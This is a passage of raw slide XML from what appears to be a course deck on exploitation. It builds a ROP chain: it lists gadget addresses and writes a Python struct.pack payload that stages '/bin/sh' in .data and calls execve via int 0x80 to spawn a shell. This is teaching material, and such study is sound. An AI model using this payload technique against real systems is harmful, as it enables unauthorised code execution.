              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x80481c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>Pop %ecx, ret at 0x80e4bd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x80541b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x807b406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>int 0x80 at 0x80493e1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>Now we can build our shellcode!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181</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1568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the ROP chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We’ve reached the point where building the ROP payload by hand is tedious (that little endian)</a:t>
            </a:r>
          </a:p>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mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1a</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e9</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06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> +' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So let’s write our payload in a Python script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182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156872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fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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50 * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</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Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</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0x080ea060) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</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0x080bb6d6)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bin</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endParaRPr lang="en-US" dirty="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Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> to @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 4</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0x080ea064) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 4</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0x080bb6d6)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sh</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 8</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0x080ea068) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 8</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0x80541b0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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xor</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ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> +=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en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85247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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now the null-terminated string /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> will be at 0x080ea060, which is first argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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 Next build up the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> vector for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need to have @.data followed by zero</a:t>
            </a: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 Let's use @.data + 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p +=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0x080ea06c) # @.data +12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080bb6d6) # pop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0x080ea060) # @.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</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a:t>
            </a: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 Now to add NULL to @.data + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p +=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0x080ea070) # @.data + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80541b0)  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>184</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167347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fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now we have all the data we need in memory, time to call</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(@.data, @.data+12, @.data+8)</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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is first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path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080481c9) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx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0x080ea060) # @ .data</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is second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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a: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p += pack('&lt;I', 0x080e4bd1) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx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0x080ea06c) # @ .data + 12</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is the third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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a: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p +=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0x080ea068) # @ .data +8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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must be 11</a:t>
            </a:r>
          </a:p>
          <a:p>
